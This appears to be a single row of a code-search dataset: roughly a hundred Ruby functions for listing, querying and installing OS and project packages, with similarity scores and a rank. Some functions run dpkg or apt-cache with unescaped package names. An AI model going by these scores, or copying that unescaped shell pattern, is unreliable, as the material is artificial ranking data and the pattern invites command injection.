"def populate_ks_pkg_list(options)\n pkg_list = []\n if options['service'].to_s.match(/centos|fedora|rhel|sl_|oel/)\n if not options['service'].to_s.match(/fedora/)\n pkg_list.push(\"@base\")\n end\n pkg_list.push(\"@core\")\n if options['service'].to_s.match(/[a-z]_6/)\n pkg_list.push(\"@console-internet\")\n pkg_list.push(\"@system-admin-tools\")\n end\n if not options['service'].to_s.match(/sl_6|[a-z]_5|fedora/)\n pkg_list.push(\"@network-file-system-client\")\n end\n if options['service'].to_s.match(/centos_[6,7]|fedora|sl_[6,7]/)\n if not options['service'].to_s.match(/fedora_2[3-9]|centos_6/)\n pkg_list.push(\"redhat-lsb-core\")\n if not options['service'].to_s.match(/rhel_[6,7]|oel_[6,7]|centos_7/)\n pkg_list.push(\"augeas\")\n pkg_list.push(\"tk\")\n end\n end\n if not options['service'].to_s.match(/fedora|_[6,7,8]/)\n pkg_list.push(\"ruby\")\n pkg_list.push(\"ruby-irb\")\n pkg_list.push(\"rubygems\")\n pkg_list.push(\"ruby-rdoc\")\n pkg_list.push(\"ruby-devel\")\n end\n if not options['service'].to_s.match(/centos_6/)\n pkg_list.push(\"augeas-libs\")\n pkg_list.push(\"ruby-libs\")\n end\n end\n if not options['service'].to_s.match(/fedora|el_[7,8]|centos_[6,7,8]/)\n pkg_list.push(\"grub\")\n pkg_list.push(\"libselinux-ruby\")\n end\n if options['service'].to_s.match(/el_[7,8]|centos_[7,8]/)\n pkg_list.push(\"iscsi-initiator-utils\")\n end\n if not options['service'].to_s.match(/centos_6/)\n pkg_list.push(\"e2fsprogs\")\n pkg_list.push(\"lvm2\")\n end\n if not options['service'].to_s.match(/fedora/)\n pkg_list.push(\"kernel-devel\")\n if not options['service'].to_s.match(/centos_6/)\n pkg_list.push(\"automake\")\n pkg_list.push(\"autoconf\")\n pkg_list.push(\"lftp\")\n pkg_list.push(\"avahi\")\n end\n end\n pkg_list.push(\"kernel-headers\")\n pkg_list.push(\"dos2unix\")\n pkg_list.push(\"unix2dos\")\n if not options['service'].to_s.match(/fedora_2[4-9]|centos_6/)\n pkg_list.push(\"zlib-devel\")\n end\n if not options['service'].to_s.match(/fedora/)\n if not options['service'].to_s.match(/centos_6/)\n pkg_list.push(\"libgpg-error-devel\")\n pkg_list.push(\"libxml2-devel\")\n pkg_list.push(\"libgcrypt-devel\")\n pkg_list.push(\"xz-devel\")\n pkg_list.push(\"libxslt-devel\")\n pkg_list.push(\"libstdc++-devel\")\n end\n if not options['service'].to_s.match(/rhel_5|fedora|centos_6/)\n pkg_list.push(\"perl-TermReadKey\")\n pkg_list.push(\"git\")\n pkg_list.push(\"perl-Git\")\n end\n pkg_list.push(\"gcc\")\n pkg_list.push(\"gcc-c++\")\n if not options['service'].to_s.match(/centos_|el_8/)\n pkg_list.push(\"dhcp\")\n end\n pkg_list.push(\"xinetd\")\n pkg_list.push(\"tftp-server\")\n end\n if not options['service'].to_s.match(/el_|centos_/)\n pkg_list.push(\"libgnome-keyring\")\n end\n if not options['service'].to_s.match(/rhel_5/)\n pkg_list.push(\"perl-Error\")\n end\n pkg_list.push(\"httpd\")\n if options['service'].to_s.match(/fedora/)\n pkg_list.push(\"net-tools\")\n pkg_list.push(\"bind-utils\")\n end\n if not options['service'].to_s.match(/fedora|el_8|centos_8/)\n pkg_list.push(\"ntp\")\n end\n pkg_list.push(\"rsync\")\n if options['service'].to_s.match(/sl_6/)\n pkg_list.push(\"-samba-client\")\n end\n end\n return pkg_list\nend",
"def packages\n Autoproj.warn_deprecated \"use #each_package instead\"\n each_package.to_a\n end",
"def pkginfo_from_pkg(package)\n raise RuntimeError, \"#{self.class} needs to overwrite pkginfo_from_pkg\"\n end",
"def active_packages(_packages=nil)\n _packages ||= self.packages\n _packages.select{|p| p.active == true}\n end",
"def differentiate(packages)\n named_groups = Hash.new{|h,k| h[k] = []}\n packages.each{|p| named_groups[p.name] << p }\n named_groups.each do |name, packages| \n if packages.length > 1\n packages.each{|p| p.name = \"#{p.name} (#{p.paths.first})\"} \n end\n end\n end",
"def versions_for_select(unit_member)\n static_options = [['Most Recent','']]\n pb = package_branch\n pb.bind_to_scope(unit_member)\n dynamic_options = pb.packages.map {|p| [p.version, p.id]}\n static_options + dynamic_options\n end",
"def packages\n @packages ||= []\n end",
"def packages\n @packages ||= []\n end",
"def set_package_info\n download_and_extract_package\n parse_package_description\n @package_hash = filter_into_package @package_desc\n @version_hash = filter_into_version @package_desc\n @author_hash = filter_into_author @package_desc[\"Author\"]\n @maintainer_hash = filter_into_author @package_desc[\"Maintainer\"]\n end",
"def supported_pkgs\n {\"rpm\"=>1, \"deb\"=>1}\nend",
"def packages_for_multiple_projects\n ::Packages::Package.for_projects(projects_visible_to_current_user)\n end",
"def layout_packages(validate = true)\n result = PackageSelection.new\n Autoproj.in_file(file) do\n normalized_layout.each_key do |pkg_or_set|\n weak =\n if (meta = metapackages[pkg_or_set])\n meta.weak_dependencies?\n end\n\n resolve_package_name(pkg_or_set).each do |pkg_type, pkg_name|\n result.select(\n pkg_or_set, pkg_name,\n osdep: (pkg_type == :osdeps),\n weak: weak\n )\n end\n rescue PackageNotFound => e\n raise e, \"#{pkg_or_set}, which is selected in the layout, \"\\\n \"is unknown: #{e.message}\", e.backtrace\n end\n end\n\n begin\n result.filter_excluded_and_ignored_packages(self)\n rescue ExcludedSelection => e\n if validate\n raise e, \"#{e.selection}, which is selected in the layout, cannot be built: #{e.message}\", e.backtrace\n end\n end\n result\n end",
"def package\n @options['package']\n end",
"def installed_packages()\n\t\t\tend",
"def installed_packages()\n\t\t\t\treturn(PackageList.new())\n\t\t\tend",
"def packages()\n\t\t\t\traise(PackageError, \"A full package list is not implemented on OpenBSD\")\n\t\t\tend",
"def installed_packages()\n\t\t\t\tpackages = PackageList.new()\n\t\t\t\tpackageregex = /^([^ ]+)-([^- ]+)\\s+(.*)$/\n\n\t\t\t\tinstalledpackageslist = `/usr/sbin/pkg_info`\n\t\t\t\tinstalledpackageslist.each_line() { |line|\n\t\t\t\t\tline.strip!()\n\t\t\t\t\tmatch = packageregex.match(line)\n\t\t\t\t\tif(match != nil)\n\t\t\t\t\t\tname = match[1]\n\t\t\t\t\t\tversion = match[2]\n\t\t\t\t\t\tdescription = match[3]\n\n\t\t\t\t\t\tpackages[name] = PackageInfo.new()\n\t\t\t\t\t\tpackages[name].name = name\n\t\t\t\t\t\tpackages[name].version = version\n\t\t\t\t\t\tpackages[name].description = description\n\t\t\t\t\tend\n\t\t\t\t}\n\n\t\t\t\treturn(packages)\n\t\t\tend",
"def packages()\n\t\t\tend",
"def listpackages\n packages = []\n\n @repository.categories.each do |category|\n Architecture.dataset(category).each do |entry|\n source = Architecture.new(entry[:architecture], entry[:component], entry[:suitename], category)\n source.files.each do |fullname|\n package = Package.new(fullname, entry[:suitename], entry[:component])\n packages << {\n :fullname => fullname,\n :category => category,\n :basename => File.basename(fullname),\n :controlfile => package.controlfile,\n :component => entry[:component],\n :suitename => entry[:suitename],\n :architecture => entry[:architecture]\n }\n end\n end\n if category.eql? \"stage\"\n Component.dataset(category).each do |entry|\n source = Component.new(entry[:component], entry[:suitename], category)\n source.files.each do |fullname|\n package = Package.new(fullname, entry[:suitename], entry[:component])\n packages << {\n :fullname => fullname,\n :category => category,\n :basename => File.basename(fullname),\n :controlfile => package.controlfile,\n :component => entry[:component],\n :suitename => entry[:suitename],\n :architecture => \"unknown\"\n }\n end\n end\n end\n end\n packages\n end",
"def packages()\n\t\t\t\treturn(PackageList.new())\n\t\t\tend",
"def import_selected_packages(selection, updated_packages, options = Hash.new)\n all_processed_packages = Set.new\n\n parallel_options, options = Kernel.filter_options options,\n parallel: ws.config.parallel_import_level\n\n # This is used in the ensure block, initialize as early as\n # possible\n executor = Concurrent::FixedThreadPool.new(parallel_options[:parallel], max_length: 0)\n\n options, import_options = Kernel.filter_options options,\n recursive: true,\n retry_count: nil\n\n ignore_errors = options[:ignore_errors]\n retry_count = options[:retry_count]\n manifest = ws.manifest\n\n selected_packages = selection.each_source_package_name.map do |pkg_name|\n manifest.find_autobuild_package(pkg_name)\n end.to_set\n\n # The reverse dependencies for the package tree. It is discovered as\n # we go on with the import\n #\n # It only contains strong dependencies. Optional dependencies are\n # not included, as we will use this only to take into account\n # package exclusion (and that does not affect optional dependencies)\n reverse_dependencies = Hash.new { |h, k| h[k] = Set.new }\n\n completion_queue = Queue.new\n pending_packages = Set.new\n # The set of all packages that are currently selected by +selection+\n all_processed_packages = Set.new\n interactive_imports = Array.new\n package_queue = selected_packages.to_a.sort_by(&:name)\n failures = Hash.new\n while failures.empty? || ignore_errors\n # Queue work for all packages in the queue\n package_queue.each do |pkg|\n # Remove packages that have already been processed\n next if all_processed_packages.include?(pkg)\n all_processed_packages << pkg\n\n if !pre_package_import(selection, manifest, pkg, reverse_dependencies)\n next\n elsif pkg.importer.interactive?\n interactive_imports << pkg\n next\n end\n\n pending_packages << pkg\n import_future = Concurrent::Future.new(executor: executor, args: [pkg]) do |import_pkg|\n ## COMPLETELY BYPASS RAKE HERE\n # The reason is that the ordering of import/prepare between\n # packages is not important BUT the ordering of import vs.\n # prepare in one package IS important: prepare is the method\n # that takes into account dependencies.\n if retry_count\n import_pkg.importer.retry_count = retry_count\n end\n import_pkg.import(import_options.merge(allow_interactive: false))\n end\n import_future.add_observer do |time, result, reason|\n completion_queue << [pkg, time, result, reason]\n end\n import_future.execute\n end\n package_queue.clear\n\n if completion_queue.empty? && pending_packages.empty?\n # We've nothing to process anymore ... process\n # interactive imports if there are some. Otherwise,\n # we're done\n if interactive_imports.empty?\n return all_processed_packages\n else\n interactive_imports.each do |pkg|\n begin\n result = pkg.import(import_options.merge(allow_interactive: true))\n rescue Exception => reason\n end\n completion_queue << [pkg, Time.now, result, reason]\n end\n interactive_imports.clear\n end\n end\n\n # And wait one to finish\n pkg, time, result, reason = completion_queue.pop\n pending_packages.delete(pkg)\n if reason\n if reason.kind_of?(Autobuild::InteractionRequired)\n interactive_imports << pkg\n else\n # One importer failed... terminate\n Autoproj.error \"import of #{pkg.name} failed\"\n if !reason.kind_of?(Interrupt)\n Autoproj.error \"#{reason}\"\n end\n failures[pkg] = reason\n end\n else\n if new_packages = post_package_import(selection, manifest, pkg, reverse_dependencies)\n # Excluded dependencies might have caused the package to be\n # excluded as well ... do not add any dependency to the\n # processing queue if it is the case\n if manifest.excluded?(pkg.name)\n selection.filter_excluded_and_ignored_packages(manifest)\n elsif options[:recursive]\n package_queue = new_packages.sort_by(&:name)\n end\n end\n end\n end\n\n if !failures.empty?\n raise ImportFailed, \"import of #{failures.size} packages failed: #{failures.keys.map(&:name).sort.join(\", \")}\"\n end\n\n all_processed_packages\n\n ensure\n if failures && !failures.empty? && !ignore_errors\n Autoproj.error \"waiting for pending import jobs to finish\"\n end\n if executor\n executor.shutdown\n executor.wait_for_termination\n end\n updated_packages.concat(all_processed_packages.find_all(&:updated?).map(&:name))\n end",
"def installed_packages()\n\t\t\t\tinstalledpackagelist = `#{@finkbin} list -i`\n\n\t\t\t\tinstalledpackages = PackageList.new()\n\t\t\t\tinstalledpackagelist.each_line() { |line|\n\t\t\t\t\tlinearr = line.split()\n\t\t\t\t\tinstalledpackages[linearr[1]] = PackageInfo.new()\n\t\t\t\t\tinstalledpackages[linearr[1]].name = linearr[1]\n\t\t\t\t\tinstalledpackages[linearr[1]].version = linearr[2]\n\t\t\t\t\tinstalledpackages[linearr[1]].description = linearr[3]\n\t\t\t\t\tinstalledpackages[linearr[1]].installed = true\n\t\t\t\t}\n\n\t\t\t\treturn(installedpackages)\n\t\t\tend",
"def list_packages\n res = []\n out = Aptly::runcmd \"aptly mirror show -with-packages #{@name.quote}\"\n Aptly::parse_indented_list out.lines\n end",
"def search_for_description pkgname, packages = []\n cache_key = \"description_package_#{pkgname.downcase}\"\n description_package = Rails.cache.fetch(cache_key, :expires_in => 12.hours) do\n if packages.blank?\n packages = Seeker.prepare_result(\"\\\"#{pkgname}\\\"\", nil, nil, nil, nil)\n packages = packages.reject {|p| p.first.type == 'ymp'}\n end\n packages.select {|p| p.name == pkgname}.each do |package|\n description_package = nil\n unless package.description.blank?\n description_package = package\n logger.info \"Found package info for #{pkgname} in: #{package.project}\"\n break\n end\n logger.error \"No package info for #{pkgname} in: #{package.project}\"\n end\n description_package\n end\n end",
"def package_information\n puts\n puts \"%30s%s\" % [\"Plugin information : \", @package.metadata[:name]]\n puts \"%30s%s\" % [\"-\" * 22, \"-\" * 22]\n puts \"%30s%s\" % [\"Plugin Type : \", @package.plugintype.capitalize]\n puts \"%30s%s\" % [\"Package Output Format : \", @package_type.upcase]\n puts \"%30s%s\" % [\"Version : \", @package.metadata[:version]]\n puts \"%30s%s\" % [\"Iteration : \", @package.iteration]\n puts \"%30s%s\" % [\"Vendor : \", @package.vendor]\n puts \"%30s%s\" % [\"Post Install Script : \", @package.postinstall] if @package.postinstall\n puts \"%30s%s\" % [\"Author : \", @package.metadata[:author]]\n puts \"%30s%s\" % [\"License : \", @package.metadata[:license]]\n puts \"%30s%s\" % [\"URL : \", @package.metadata[:url]]\n\n if @package.packagedata.size > 0\n @package.packagedata = @package.packagedata.select{|k, v| v != nil}\n @package.packagedata.each_with_index do |values, i|\n if i == 0\n puts \"%30s%s\" % [\"Identified Packages : \", values[0]]\n else\n puts \"%30s%s\" % [\" \", values[0]]\n end\n end\n end\n end",
"def [](packagename)\n\t\t\t\treturn(packages()[packagename])\n\t\t\tend",
"def kpkg_info(kpkg)\n info = /linux-image-((\\d+\\.\\d+\\.\\d+)-(\\d+)-(.*))/.match(kpkg)\n\n unless info\n raise \"#{kpkg} does not follow Debian kernel package naming conventions\"\n end\n\n # turn the matched info into a hash and return it\n Hash[[:uname_r, :kernel_version, :abi_version, :flavor].zip(info.captures)]\nend",
"def find_packages(name, constraint = nil)\n # implement inside child\n end",
"def run_package_for_specified(bundle_info)\n if $options[:buildAll]\n info 'Packaging all dependencies'\n\n $toPackageDeps = []\n\n all_dependencies.each do |dep|\n files = dep.getInstalledFiles\n\n $toPackageDeps.push dep.Name if files && !files.empty?\n end\n\n puts $toPackageDeps.to_s\n end\n\n package_dependencies $toPackageDeps, bundle_info\nend",
"def packages_for_a_single_project\n project.packages\n end",
"def query_package(pkg_name)\n @logger.info(\"Querying for #{pkg_name}\")\n @index[:packages].key?(pkg_name)\n end",
"def default_packages(*names)\n pkg_set = Autoproj.current_package_set\n clear_metapackage(pkg_set.name)\n metapackage(pkg_set.name, *names)\nend",
"def setpkg\n setupini = findini\n abort 'Error: Failed to find a path to setup.ini.' unless setupini.is_a?(String)\n abort \"Error: setup.ini is not readable!! #{setupini}\" unless File.readable?(setupini)\n\n File.open(setupini, File::RDONLY) do |fp|\n cur = ''\n\n fp.flock(File::LOCK_SH)\n while l = fp.gets\n case l\n when /^@/\n cur = l.sub(/^@\\s*/, '').strip\n @pkg[cur] = []\n when /^requires:/\n @pkg[cur] = l.sub(/^requires:\\s*/, '').split(' ').map {|v| v.strip }\n when /^sdesc:/\n @pkg_d[cur] = l.sub(/^sdesc:\\s*\"([^\"]+)\"/, '\\1').gsub(/\\\\(.)/, '\\1').strip\n when /^category:/\n @b_pkg << cur if l =~ /\\bBase\\b/\n @o_pkg << cur if l =~ /\\b_obsolete\\b/\n @p_pkg << cur if l =~ /\\b_PostInstallLast\\b/\n end\n end\n end\n end",
"def setpkg2\n abort \"Error: installed.db is not readable!! #{INSTALLDB}\" unless File.readable?(INSTALLDB)\n\n r_pkg = []\n\n File.open(INSTALLDB, File::RDONLY) do |fp|\n fp.flock(File::LOCK_SH)\n\n fp.gets # skip 1st line\n while l = fp.gets\n l = l.split(' ', 2)[0].strip\n\n if @pkg[l].nil?\n warn \"Warning: Package #{l} is marked as installed, but it is not listed in setup.ini.\"\n else\n r_pkg << @pkg[l]\n @i_pkg << l\n end\n end\n end\n\n @r_pkg = r_pkg.flatten\n end",
"def apt_packages\n PRE_INSTALLED_OS_PACKAGES[@app.release].join(\" #{NL_TAB}\")\n end",
"def package_list(packages, version)\n packages[:base].to_a.join(' ') + ' ' + packages[version].to_a.join(' ')\n end",
"def each_package\n package_name_array.each_with_index do |package_name, i|\n candidate_version = candidate_version_array[i]\n current_version = current_version_array[i]\n magic_version = use_magic_version? ? magic_version_array[i] : current_version_array[i]\n new_version = new_version_array[i]\n yield package_name, new_version, current_version, candidate_version, magic_version\n end\n end",
"def package_list(packages, version)\n Array(packages[:base]).join(' ') + ' ' + Array(packages[version]).join(' ')\n end",
"def pkg_check(pkg_array)\n pkg_array.each do |pkg|\n @packages[\"#{pkg}\"].each_key do |k|\n\n dpkg_res = `dpkg -s #{k} >/dev/null 2>&1 && { printf \"success\"; } || { printf \"fail\";}`\n if \"#{dpkg_res}\".include? \"success\"\n @packages[\"#{pkg}\"][\"#{k}\"] = \"true\"\n end\n end\n end\n@packages.select{|k, _| pkg_array.include?(k)}\nend",
"def packages(*names)\n names.empty? ? @packages : @packages = names\n end",
"def check_pkg_info\n return false if options['package_url'].nil? ||\n options['package_name'].nil?\n true\nend",
"def packages\n JSON.parse(package_metadata_command).values.flatten\n rescue JSON::ParserError => e\n message = \"Licensed was unable to parse the output from 'pnpm licenses list'. JSON Error: #{e.message}\"\n raise Licensed::Sources::Source::Error, message\n end",
"def query\n self.class.newstylepkgoutput\n begin\n output = pkg(:list, \"-H\", @resource[:name])\n rescue Puppet::ExecutionFailure\n # pkg returns 1 if the package is not found.\n return {:ensure => :absent, :name => @resource[:name]}\n end\n\n hash = self.class.parse_line(output.chomp) || {:ensure => :absent, :name => @resource[:name]}\n hash\n end",
"def query\n r = exec_cmd(command(:pkg), 'list', '-Hv', @resource[:name])\n return {:ensure => :absent, :name => @resource[:name]} if r[:exit] != 0\n self.class.parse_line(r[:out])\n end",
"def each_package(&block)\n packages_by_name.each_value(&block)\n end",
"def package_info(package_name)\n # return the package hash if it's in the brew info hash\n return brew_info[package_name] if brew_info[package_name]\n\n # check each item in the hash to see if we were passed an alias\n brew_info.each_value do |p|\n return p if p[\"full_name\"] == package_name || p[\"aliases\"].include?(package_name)\n end\n\n {}\n end",
"def find_package_definition(name)\n packages[validate_package_name_argument(name, require_existing: false)]\n end",
"def find_package_by_name(name)\n @packages[name]\n end",
"def info(pkg)\n\t\t\tr={type: \"info\", arg: pkg}\n\t\t\tself.query(r).first\n\t\tend",
"def all_required_packages(selection, with_rock_release_prefix = false)\n raise RuntimeError, \"#{self.class} needs to overwrite all_required_packages\"\n end",
"def deps(pkg) # FIXME: \"*** PACKAGE MAY NOT BE DELETED *** \"\n if pkg.status != :available\n components = `#{@cmd} -n #{pkg.name}`.split(\"Requires:\\n\")\n if components.size > 1\n return components[1].strip\n else\n return \"[No depends]\"\n end\n else\n if File.exist?(File.expand_path(\"~/Library/Application Support/Guigna/pkgsrc/INDEX\"))\n # TODO: parse INDEX\n end\n \"[Not available]\"\n end\n end",
"def search_packages(pattern)\n packages = RailsPwnerer::Base.all_packages\n Hash[packages.select { |key, value|\n pattern.kind_of?(Regexp) ? (pattern =~ key) : key.index(pattern)\n }.map { |key, value|\n # apt-cache search sometimes leaves version numbers out\n # Update the cache with version numbers.\n if value.nil?\n info = RailsPwnerer::Base.package_info_hash(\n Kernel.`(\"apt-cache show #{key}\"))\n packages[key] = value = info['Version']\n end\n [key, value]\n }]\n end",
"def all_selected_osdep_packages(validate = true)\n default_packages(validate).all_selected_osdep_packages(self)\n end",
"def dependencies(pkg)\n pkg.resolve_optional_dependencies\n deps_rock_packages = pkg.dependencies.map do |pkg_name|\n debian_name(Autoproj.manifest.package(pkg_name).autobuild)\n end.sort\n\n pkg_osdeps = Autoproj.osdeps.resolve_os_dependencies(pkg.os_packages)\n # There are limitations regarding handling packages with native dependencies\n #\n # Currently gems need to converted into debs using gem2deb\n # These deps dependencies are updated here before uploading a package\n # \n # Generation of the debian packages from the gems can be done in postprocessing step\n # i.e. see convert_gems\n \n deps_osdeps_packages = []\n native_package_manager = Autoproj.osdeps.os_package_handler\n _, native_pkg_list = pkg_osdeps.find { |handler, _| handler == native_package_manager }\n\n deps_osdeps_packages += native_pkg_list if native_pkg_list\n\n # Update global list\n @osdeps += deps_osdeps_packages\n\n non_native_handlers = pkg_osdeps.collect do |handler, pkg_list|\n if handler != native_package_manager\n [handler, pkg_list]\n end\n end.compact\n\n non_native_handlers.each do |pkg_handler, pkg_list|\n # Convert native ruby gems package names to rock-xxx \n if pkg_handler.kind_of?(Autoproj::PackageManagers::GemManager)\n pkg_list.each do |name,version|\n @ruby_gems << [name,version]\n deps_osdeps_packages << debian_ruby_name(name)\n end\n else\n raise ArgumentError, \"cannot package #{pkg.name} as it has non-native dependencies (#{pkg_list}) -- #{pkg_handler.class} #{pkg_handler}\"\n end\n end\n\n # Remove duplicates\n @osdeps.uniq!\n @ruby_gems.uniq!\n\n # Return rock packages and osdeps\n [deps_rock_packages, deps_osdeps_packages]\n end",
"def package_names_for_targets\n package_names_for_targets = []\n target_version_array.each_with_index do |target_version, i|\n if !target_version.nil?\n package_name = package_name_array[i]\n package_names_for_targets.push(package_name)\n else\n package_names_for_targets.push(nil) if allow_nils?\n end\n end\n multipackage? ? package_names_for_targets : package_names_for_targets[0]\n end",
"def packages_missing_candidates\n @packages_missing_candidates ||=\n begin\n missing = []\n each_package do |package_name, new_version, current_version, candidate_version, magic_version|\n missing.push(package_name) if magic_version.nil? && candidate_version.nil?\n end\n missing\n end\n end",
"def get_variants\n return [] if is_pdc?\n get_variants_by_package.values.flatten.uniq\n end",
"def packages\n manifest.each_with_object({}) do |(src, package_name), hsh|\n next if src.nil? || src.empty?\n hsh[package_name] ||= []\n hsh[package_name] << File.join(Licensed::Git.repository_root, src)\n end\n end",
"def get_packages(adb_opts = {})\n packages = []\n run_adb_shell(\"pm list packages -f\", adb_opts) do |pout|\n pout.each do |line|\n @log.debug(\"{stdout} #{line}\") unless @log.nil?\n parts = line.split(\":\")\n if (parts.length > 1)\n info = parts[1].strip.split(\"=\")\n package = AndroidAdb::Package.new(info[1], info[0]);\n packages << package;\n end\n end\n end\n return packages\n end",
"def work_packages\n @work_packages ||= {\n '1' => FacilitiesManagement::RM6232::WorkPackage.selectable.map { |work_package| work_package.supplier_services.where(total: true, core: false) }.reject(&:empty?),\n '2' => FacilitiesManagement::RM6232::WorkPackage.selectable.map { |work_package| work_package.supplier_services.where(hard: true, core: false) }.reject(&:empty?),\n '3' => FacilitiesManagement::RM6232::WorkPackage.selectable.map { |work_package| work_package.supplier_services.where(soft: true, core: false) }.reject(&:empty?)\n }\n end",
"def current_package\n @current_package\n end",
"def index\n @package_items = @package.package_items\n end",
"def packages\n Dir[File.join($__HELLO_DIR__, 'packages/*/*.yml')]\n .map do |yml|\n info = YAML.load File.read yml\n info['dir'] = File.dirname yml if info\n info\n end\n .select {|p| p }\n .sort_by {|p| p['priority'] || 10 }\nend",
"def getdeps(pkg)\n deps = []\n @pkg.each {|k, v| deps << k if v.include?(pkg) }\n\n return deps\n end",
"def GetPackages\n ProbeKernel() if !@kernel_probed\n deep_copy(@kernel_packages)\n end",
"def package\n return @children['package'][:value]\n end",
"def autoinstPackages\n allpackages = []\n\n # the primary list of packages\n allpackages = Convert.convert(\n Builtins.union(allpackages, PackageAI.toinstall),\n :from => \"list\",\n :to => \"list <string>\"\n )\n\n # In autoinst mode, a kernel should not be available\n # in <packages>\n if Builtins.size(@kernel) == 0\n kernel_pkgs = Kernel.ComputePackages\n allpackages = Convert.convert(\n Builtins.union(allpackages, kernel_pkgs),\n :from => \"list\",\n :to => \"list <string>\"\n )\n else\n if Pkg.IsAvailable(@kernel)\n allpackages = Builtins.add(allpackages, @kernel)\n kernel_nongpl = Ops.add(@kernel, \"-nongpl\")\n\n if Pkg.IsAvailable(kernel_nongpl)\n allpackages = Builtins.add(allpackages, kernel_nongpl)\n end\n else\n Builtins.y2warning(\"%1 not available, using kernel-default\", @kernel)\n kernel_pkgs = Kernel.ComputePackages\n allpackages = Convert.convert(\n Builtins.union(allpackages, kernel_pkgs),\n :from => \"list\",\n :to => \"list <string>\"\n )\n end\n end\n\n deep_copy(allpackages)\n end",
"def packages_from_require(rpmdep)\n refresh\n @rpmdb.whatprovides(rpmdep)\n end",
"def metapackage(name, *packages)\n Autoproj.workspace.manifest.metapackage(name, *packages)\nend",
"def package_types\n case Ohai['platform_family']\n when 'debian'\n %w(deb)\n when 'fedora', 'rhel'\n %w(rpm)\n when 'aix'\n %w(bff)\n when 'solaris2'\n %w(solaris)\n when 'windows'\n %w(msi)\n when 'mac_os_x'\n %w(pkg mac_dmg)\n else\n %w(makeself)\n end\n end",
"def resolve_packages\n installation_manifest =\n Autoproj::InstallationManifest.from_workspace_root(ws.root_dir)\n installation_manifest.each_package.to_a +\n installation_manifest.each_package_set.to_a\n end",
"def explicitely_selected_in_layout?(package_name)\n package_name = package_name.to_str\n normalized_layout.has_key?(package_name)\n end",
"def find_packages\n declared_packages.collect do |package|\n guess = ::Albacore::PackageRepo.new(%w|./packages ./src/packages|).find_latest package.id\n debug \"#{name}: guess: #{guess} [albacore: project]\"\n guess\n end\n end",
"def parsepkg package, force_rhel = nil\n raise \"Can't parse package name '#{package}'\" unless /(?<pkgname>^.*?)-(?<ver>[0-9\\.]*\\d)[.-](?<pkginfo>.*)$/ =~ package\n\n info = { name: pkgname, version: ver }\n pkgparts = pkginfo.split /[.-]/\n case info[:format] = pkgparts.pop\n when 'rpm'\n info[:arch] = pkgparts.pop\n raise \"Architecture '#{info[:arch]}' is not supported\" unless ['x86_64','noarch'].include? info[:arch]\n if pkgparts.detect { |c| /^(?:rh)?el(\\d)(_.*)?$/ =~ c }\n info[:rhel] = $~[1]\n else\n raise \"Can't determine CentOS release for '#{package}'. Force with -c option\" unless force_rhel\n info[:rhel] = force_rhel\n end\n when 'gem'\n else\n raise \"Suffix #{info[:format]} is not a recognized package type\"\n end\n return info\nend",
"def update_for\n update_for_items.collect(&:package)\n end",
"def packages\n %w(dtach rtorrent)\nend",
"def package_types\n case platform_family\n when 'debian'\n %w(deb)\n when 'fedora', 'rhel'\n %w(rpm)\n when 'aix'\n %w(bff)\n when 'solaris2'\n %w(pkgmk)\n when 'windows'\n %w(msi)\n when 'mac_os_x'\n %w(mac_pkg mac_dmg)\n else\n %w(makeself)\n end\n end",
"def display_available_options\n output.puts\n if user_package.model_info.has_selected_model?\n output.puts \"Available Options: \"\n output.puts CarOptionList.available_options.to_s(\"\\n\")\n else\n output.puts \"You need to select a model before adding options!\"\n end\n end",
"def package(pkg)\n @pkg = pkg\n end",
"def rpm_package_information\n super\n end",
"def parse_pkg fname\n if File.extname(fname) == @extension\n lines = IO.readlines fname\n lines.each do |l|\n begin\n break if l =~ JTools::CLS_DECL_REGEX # stop if we find the class header\n next if l.strip.start_with? \"/*\", \"*\", \"//\"\n if l =~ JTools::PKG_DCL_REGEX # if package declaration found\n pkg_name = l.gsub JTools::EXTR_PKG, \"\" # extract path\n return pkg_name\n end\n rescue ArgumentError => e\n puts \"Error matching line '#{l}' In #{fname}. \" + e.message\n end\n end\n puts \"Warning: #{File.basename fname} has no or no valid package\" +\n \" declaration. Adding to default package.\" if @verbose\n \"\" # if we found nothing -> default package\n else\n raise ArgumentError.new \"Error. #{fname} is no #{@extension} file.\"\n end\n end",
"def packages\n return @packages if @packages\n\n @packages = resolve_packages.map do |pkg|\n next if ignored?(pkg)\n\n package_set = pkg.kind_of? Autoproj::InstallationManifest::PackageSet\n pkg = pkg.to_h\n local_dir = if package_set\n pkg[:raw_local_dir]\n else\n pkg[:importdir] || pkg[:srcdir]\n end\n\n Autoproj::Daemon::PackageRepository.new(\n pkg[:name] || pkg[:package_set],\n pkg[:vcs],\n package_set: package_set,\n local_dir: local_dir,\n ws: ws\n )\n end.compact\n @packages\n end",
"def sword_accept_packagings\n Utility.find_elements_by_namespace_and_name(extensions, \"http://purl.org/net/sword/terms/\", \"acceptPackaging\")\n end",
"def read_facts_packages_installed(packages)\n packages_installed = {}\n packages.each do |package, opts|\n packages_installed[package] = check_package_installed(package, opts)\n end\n\n packages_installed\nend"
] | [
"0.68138766",
"0.66908056",
"0.66548544",
"0.6567489",
"0.64760077",
"0.64440465",
"0.63981324",
"0.6337504",
"0.63027155",
"0.6271943",
"0.62538314",
"0.62475944",
"0.6244942",
"0.6211936",
"0.6166513",
"0.6117742",
"0.6111971",
"0.60975456",
"0.6069746",
"0.60353863",
"0.60045165",
"0.59927934",
"0.5972722",
"0.5972722",
"0.59699005",
"0.59542847",
"0.59535986",
"0.5942275",
"0.59297407",
"0.59051764",
"0.58698225",
"0.5867019",
"0.5831778",
"0.58278817",
"0.5807138",
"0.579785",
"0.57819545",
"0.5779892",
"0.5773167",
"0.5764276",
"0.57524437",
"0.57362235",
"0.5729624",
"0.5725924",
"0.57181615",
"0.5717771",
"0.5713209",
"0.5706147",
"0.5700165",
"0.56852055",
"0.56709194",
"0.5655291",
"0.5654348",
"0.5615942",
"0.55884326",
"0.55782235",
"0.5575615",
"0.5565309",
"0.556158",
"0.55503577",
"0.55418587",
"0.55280304",
"0.5520276",
"0.55194664",
"0.55034167",
"0.5496237",
"0.5495223",
"0.5494863",
"0.54802585",
"0.5476949",
"0.54738307",
"0.5471911",
"0.54691225",
"0.5467565",
"0.5466296",
"0.5466171",
"0.54634184",
"0.5463127",
"0.54471743",
"0.54350865",
"0.5431615",
"0.5431125",
"0.5427744",
"0.54128236",
"0.54125595",
"0.54112816",
"0.54111576",
"0.54050446",
"0.5404401",
"0.54031676",
"0.5399543",
"0.5391054",
"0.53720427",
"0.53607625",
"0.535544",
"0.53545135",
"0.5350067",
"0.5338391",
"0.5329299",
"0.53283614"
] | 0.6541327 | 4 |
